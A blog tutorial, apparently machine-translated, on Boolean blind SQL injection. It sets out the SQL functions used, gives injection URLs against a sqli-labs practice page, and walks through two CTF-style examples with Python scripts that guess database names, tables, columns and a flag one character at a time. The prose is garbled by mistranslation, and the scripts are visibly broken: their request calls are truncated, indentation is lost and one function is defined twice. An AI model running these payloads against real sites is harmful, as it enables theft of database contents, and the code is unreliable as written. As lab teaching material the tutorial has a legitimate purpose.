quotation
Previously, there is an article to bring you the basic knowledge of SQL injection and classification, including the face of a broader but not in-depth, so I'm ready to talk in detail about each type of SQL injection of the detailed utilization of methods and scenarios, today to bring you the Boolean Blind Injection, but also more commonly used a way of injection.
Basics
What is Boolean injection?
First understand what is Boolean blind, in the usual we enter the SQL statement in the web page web page will give us about the SQL statementregression (metallurgy)For example, SQL error messages, we go to SQL injection based on these error messages, but have you ever thought that if when we pass in the statement websiteIt won't show us back.What do we do when we introduce theboolean injectionThe notion that by somejudgment statementto confirm the internal information of the database, you can take a look at the following diagram:
retrospective
unpresentable
Here's how to implement our Boolean blind bets using functions on a page with only two types of returns.
function (math.)
Here are some examples of commonly used functions in Boolean blinds and what they do:
length(str): return the length of the str string.
substr(str, pos, len): Returns str as a len-length character from pos. Note that pos starts at 1, not 0 in the array.
mid(str,pos,len): same as above, intercepts the string.
ascii(str): return the ASCII code value of the leftmost character of the string str.
ord(str): same as above, return ascii code.
if(a,b,c) :a for the condition, a for true, return b, otherwise return c, such as if(1>2,1,0),return 0
Of course, this is only the most common functions, when these are disabled, we can look for other functions, the following gives you an example of how to utilize these functions.
According to the Boolean rule, the web page only returns TRUE or FALSE, so we pass the parameter like this:
http://127.0.0.1/Less-8/?id=1'and (length(database()))>8 --+
Determines whether the length of the database name is greater than 8, correctly returns TRUE, incorrectly returns FALSE.
injection process
Assuming we've finished determining the length of the database's name, the next step is to guess what the first letter of the database is.
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'and ascii(substr(database(),1,1))>110#
We can judge according to the dichotomy, when we ASCII for 110 returned as TRUE, 111 when FALSE, we can judge the ASCII code for 110 corresponding to the character for the first name of the database. About the ASCII corresponding value can refer to the following figure:
Similarly we modify the matching database field to look up the second character:
substr(database(),2,1)
The name of the database is queried assecurityAfter that we look up the first letter of the table name in order:
1' and (ascii(substr((select table_name from information_schema.tables where table_schema=''security limit 0,1),1,1)))>100 --+
Finally we get the table name emails, so we query for the first letter of the field value:
1' and (ascii(substr((select column_name from information_schema.columns where table_name='emails'),1,1)))>100 --+
Finally get the field value.
Have you found that if we try one by one time cost is not very big, so we can write scripts to automatically loop run out. The following will bring you examples.
example
Example 1
Gives us a search box.
When we try to type it, we find that typing 1 returns Hello, glzjin wants a girlfriend, typing 2 returns Do you want to be my girlfriend?, typing a number greater than 2 returns Error Occured When Fetch Result, and it also detects that our statement filters keywords such as union, but not (), considering Boolean blind injection. The keywords union and so on, but not filter (), consider Boolean blind bets. Try constructing PAYLOAD.
id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))
Display back is normal, SQL injection is possible, we utilize scripts:
import requests
import time
import re
url='http://4f098f39-88d5-4922-afcc-06e3cfa8ac6e.:81/'
flag = ''
for i in range(1,43):
max = 127
min = 0
for c in range(0,127):
s = (int)((max+min)/2)
payload = '0^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
r = (url,data = {'id':payload})
(0.005)
if 'Hello, glzjin wants a girlfriend.' in str():
min=s
else:
max=s
if((max-min)<=1):
flag+=chr(max)
print(flag)
break
Run to get FLAG:
Example 2
It is also a search box where we enter 1 and 1' respectively and get the following return:
Guessing it's a boolean injection, we start by querying the database length:
1 and length(database()) >5
After getting the database length as 4, we query the database name:
1 and ascii(substr(database(),1,1))=115
Getting the library name sqli, the next step is to query the table and fields and other operations, found a script on the web to get him to run on his own:
import requests
# Explode the library
def dataBaseName(url, mark):
name = ''
for i in range(1, 9):
for j in "sqcwertyuioplkjhgfdazxvbnm":
payload = url + "if(substr(database(),%d,1)='%s',1,0)" % (i, j)
r = (payload)
if mark in :
name = name + j
print(name)
break
print('Database name:', name)
# Explode the meter
def table_name(url,mark):
tableList = []
for i in range(0,4):
name = ''
for j in range(1,9):
for k in 'sqcwertyuioplkjhgfdazxvbnm':
payload = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,0)' %(i,j,k)
r = (payload)
if mark in :
name = name + k
print(name)
break
(name)
print('table_name:',tableList)
# Exploded fields
def column_name(url,mark):
columnList = []
for i in range(0,3):
columnName = ''
for j in range(1,9):
for k in 'sqcwertyuioplkjhgfdazxvbnm':
payload = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema = database() limit %d,1),%d,1)="%s",1,0)' %(i,j,k)
r = (payload)
if mark in :
columnName += k
print(columnName)
break
(columnName)
print("Field name:",columnList)
# Explode the first line of the field
def get_data(url,mark):
data = ''
for i in range(1,50):
for j in range(48,126):
payload = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,0)' %(i,j)
r = (payload)
if mark in :
data += chr(j)
print(data)
break
print("First value of field",data)
# Explode the first 10 lines of the field
def get_data(url,mark):
dataList = []
for i in range(1,10):
data = ''
for j in range(1,50):
for k in range(48,126):
payload = url + 'if(ASCII(SUBSTR((SELECT flag FROM `flag` limit %d,1),%d,1))=%d,1,0)' %(i,j,k)
r = (payload)
if mark in :
data += chr(k)
print(data)
break
(data)
print("Contents of the first 10 lines of the field",dataList)
if __name__ == "__main__":
url = "/?query_success"
dataBaseName(url, mark)
table_name(url, mark)
column_name(url, mark)
get_data(url,mark)
concluding remarks
Today spoke in detail about the principle of Boolean injection and infiltration process, interested partners can build their own target machine to try, the article may have the wrong place to welcome you to point out that more information about python Boolean injection infiltration please pay attention to my other related articles!